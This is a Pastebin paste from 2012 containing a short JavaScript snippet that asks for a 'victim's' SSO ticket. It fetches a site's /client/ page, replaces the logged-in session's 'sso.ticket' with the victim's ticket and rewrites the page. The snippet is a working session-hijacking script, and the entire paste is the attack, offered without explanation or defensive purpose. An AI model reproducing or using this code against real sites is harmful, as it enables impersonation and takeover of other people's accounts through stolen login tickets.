Advertisement
nPhoenix

Arrumar depois

Oct 15th, 2012
185
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. new_SSO = prompt("Digite o SSO da vítima");
  2. new Ajax.Request(/client/, {
  3.     onComplete: function (x) {
  4.         HTML = x.responseText;
  5.         SSO = HTML.match(/"sso.ticket" : "(.+)"/)[0].split('"')[3];
  6.         HTML = HTML.replace(SSO, new_SSO);
  7.         document.write(HTML);
  8.     }
  9. });
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement